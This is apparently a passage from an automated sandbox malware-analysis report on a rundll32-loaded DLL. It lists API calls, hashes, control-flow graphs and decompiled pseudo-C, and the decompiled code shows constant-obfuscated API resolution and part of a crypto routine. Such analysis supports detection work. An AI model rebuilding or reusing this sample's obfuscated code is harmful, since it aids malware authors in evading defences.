                                                                                                                                                            • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __lock.LIBCMT ref: 1002FA87
                                                                                                                                                              • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                                              • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                                              • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                                            • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                            • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                                            • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                            • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                                            • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                                                            • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                                            • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3296620671-0
                                                                                                                                                            • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                                            • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                                            • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                                            • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00377F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 275 377f5d-377ff1 call 3820b9 call 38aa30 CreateProcessW
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0037AD99,?,?,?,181C8C04,0037AD99), ref: 00377FEB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction ID: 0e077f6d55c0fc79e9b05ece8147445b89fe0ba675fe17c1794b1ecc8317ded7
                                                                                                                                                            • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction Fuzzy Hash: E011D672402118BBDF62AFD1DD09CDF7F79EF093A4F145144F91925121D2768A60EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003846BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 280 3846bb-38473b call 3820b9 call 38aa30 SHGetFolderPathW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E003846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003820B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0038AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                                            0x003846d5
                                                                                                                                                            0x003846da
                                                                                                                                                            0x003846e4
                                                                                                                                                            0x003846ec
                                                                                                                                                            0x003846f3
                                                                                                                                                            0x003846f7
                                                                                                                                                            0x003846fe
                                                                                                                                                            0x00384705
                                                                                                                                                            0x0038470c
                                                                                                                                                            0x00384724
                                                                                                                                                            0x00384735
                                                                                                                                                            0x0038473b

                                                                                                                                                            APIs
                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00384735
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                            • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction ID: 09782a1b4ea3e555b4518fdc90f4ed0ac16dda0e58b05b4e3be04706e9bb403c
                                                                                                                                                            • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction Fuzzy Hash: AF01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108185F91866211D2758A60DBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003793ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 285 3793ed-379461 call 38aa30 ExitProcess
                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E003793ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0038AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                                            0x003793f3
                                                                                                                                                            0x00379405
                                                                                                                                                            0x00379411
                                                                                                                                                            0x00379412
                                                                                                                                                            0x00379413
                                                                                                                                                            0x0037941a
                                                                                                                                                            0x00379421
                                                                                                                                                            0x00379428
                                                                                                                                                            0x00379433
                                                                                                                                                            0x00379436
                                                                                                                                                            0x0037943d
                                                                                                                                                            0x00379444
                                                                                                                                                            0x00379451
                                                                                                                                                            0x0037945b

                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNELBASE(00000000), ref: 0037945B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction ID: 60a4d0680975cbf6830732f16911f82c1889d872f7ced8ab84c472361a29988a
                                                                                                                                                            • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction Fuzzy Hash: CEF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7745F459B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 305 37b23c-37b2c6 call 3820b9 call 38aa30 lstrcmpiW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0037B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0038AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                                            0x0037b23f
                                                                                                                                                            0x0037b240
                                                                                                                                                            0x0037b241
                                                                                                                                                            0x0037b244
                                                                                                                                                            0x0037b247
                                                                                                                                                            0x0037b24a
                                                                                                                                                            0x0037b24e
                                                                                                                                                            0x0037b24f
                                                                                                                                                            0x0037b254
                                                                                                                                                            0x0037b25e
                                                                                                                                                            0x0037b26a
                                                                                                                                                            0x0037b271
                                                                                                                                                            0x0037b278
                                                                                                                                                            0x0037b27f
                                                                                                                                                            0x0037b286
                                                                                                                                                            0x0037b28d
                                                                                                                                                            0x0037b294
                                                                                                                                                            0x0037b29b
                                                                                                                                                            0x0037b2b3
                                                                                                                                                            0x0037b2c1
                                                                                                                                                            0x0037b2c6

                                                                                                                                                            APIs
                                                                                                                                                            • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0037B2C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                            • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction ID: 990d1e94676dfe5714b5f3eca96472de2481dd2d6cd9bb128b4d258173c82d31
                                                                                                                                                            • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction Fuzzy Hash: DC011AB2C04708FFDF45DFD4DD468AEBB75EB44304F108189B90566152E3754B609B51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 0038E395 Relevance: 24.5, Strings: 19, Instructions: 720COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E0038E395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _t823;
				void* _t829;
				signed int* _t832;
				signed int _t833;
				signed int _t845;
				signed int _t858;
				signed int _t862;
				intOrPtr _t868;
				signed int _t888;
				void* _t939;
				void* _t948;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int* _t988;
				void* _t991;

				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_v8 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E003820B9(__ecx & 0x0000ffff);
				_v284 = 0x99c43c;
				_t988 =  &(( &_v288)[0xd]);
				_v284 = _v284 + 0xbb14;
				_v284 = _v284 >> 0xb;
				_v284 = _v284 ^ 0x0000134f;
				_t862 = 0;
				_v120 = 0x27310;
				_t977 = 0x329d839;
				_t956 = 0x43;
				_v120 = _v120 / _t956;
				_v120 = _v120 + 0xe2f5;
				_v120 = _v120 ^ 0x0000ec43;
				_v36 = 0x50046c;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x00a00810;
				_v116 = 0x7f268a;
				_v116 = _v116 ^ 0x5f915552;
				_t957 = 0x1b;
				_v276 = 0;
				_v116 = _v116 * 0x3e;
				_v116 = _v116 ^ 0x3bc08e50;
				_v228 = 0xb299e8;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 << 0x10;
				_v228 = _v228 * 0x42;
				_v228 = _v228 ^ 0xb8144000;
				_v64 = 0x620921;
				_v64 = _v64 | 0xbe88b167;
				_v64 = _v64 ^ 0xbeaab967;
				_v172 = 0xae09b0;
				_v172 = _v172 | 0xde677f7d;
				_v172 = _v172 ^ 0xc5d04777;
				_v172 = _v172 ^ 0x1b3b388a;
				_v132 = 0xc06abb;
				_v132 = _v132 ^ 0x2b7b17d1;
				_v132 = _v132 / _t957;
				_v132 = _v132 ^ 0x059ea5d4;
				_v236 = 0x9fdac6;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0x9b65;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x051f8b2b;
				_v108 = 0xc74878;
				_v108 = _v108 + 0x314b;
				_v108 = _v108 * 0x41;
				_v108 = _v108 ^ 0x32a5e883;
				_v196 = 0x1587ec;
				_v196 = _v196 ^ 0x07496474;
				_v196 = _v196 >> 7;
				_t958 = 0x2c;
				_v196 = _v196 / _t958;
				_v196 = _v196 ^ 0x000054ad;
				_v244 = 0xbebf62;
				_v244 = _v244 << 0xb;
				_v244 = _v244 + 0xffffca16;
				_v244 = _v244 << 0xe;
				_v244 = _v244 ^ 0x36858000;
				_v72 = 0x750de5;
				_v72 = _v72 | 0xb336b270;
				_v72 = _v72 ^ 0xb377bff5;
				_v256 = 0xc175fb;
				_t984 = 0x72;
				_t959 = 0x28;
				_v256 = _v256 * 0x26;
				_v256 = _v256 >> 5;
				_v256 = _v256 ^ 0xfb5a89da;
				_v256 = _v256 ^ 0xfbbf3581;
				_v76 = 0x1a7820;
				_v76 = _v76 | 0xb8d3f172;
				_v76 = _v76 ^ 0xb8dbf96d;
				_v224 = 0x97ff87;
				_v224 = _v224 / _t984;
				_v224 = _v224 >> 6;
				_v224 = _v224 * 0x5d;
				_v224 = _v224 ^ 0x0001effe;
				_v40 = 0x7c0450;
				_v40 = _v40 / _t959;
				_v40 = _v40 ^ 0x000319b6;
				_v136 = 0x260fad;
				_v136 = _v136 + 0x622a;
				_t960 = 0x1c;
				_v136 = _v136 / _t960;
				_v136 = _v136 ^ 0x00015e7e;
				_v288 = 0x61f743;
				_t961 = 0x66;
				_v288 = _v288 * 0x25;
				_v288 = _v288 ^ 0x0e2ee817;
				_v288 = 0x858eca;
				_v288 = _v288 / _t984;
				_v288 = _v288 ^ 0x0002de1a;
				_v280 = 0xcba1b8;
				_v280 = _v280 / _t961;
				_v280 = _v280 ^ 0xc2211053;
				_v280 = _v280 + 0xffff75b7;
				_v280 = _v280 ^ 0xc2279606;
				_v288 = 0x614b46;
				_v288 = _v288 >> 4;
				_v288 = _v288 ^ 0x000cf9c3;
				_v288 = 0x794624;
				_v288 = _v288 + 0xb4d0;
				_v288 = _v288 ^ 0x0072cd5b;
				_v288 = 0xcdbe83;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x00034ad6;
				_v288 = 0x24639d;
				_t962 = 0x28;
				_v288 = _v288 / _t962;
				_v288 = _v288 ^ 0x000e4507;
				_v288 = 0x4730ec;
				_t963 = 0x21;
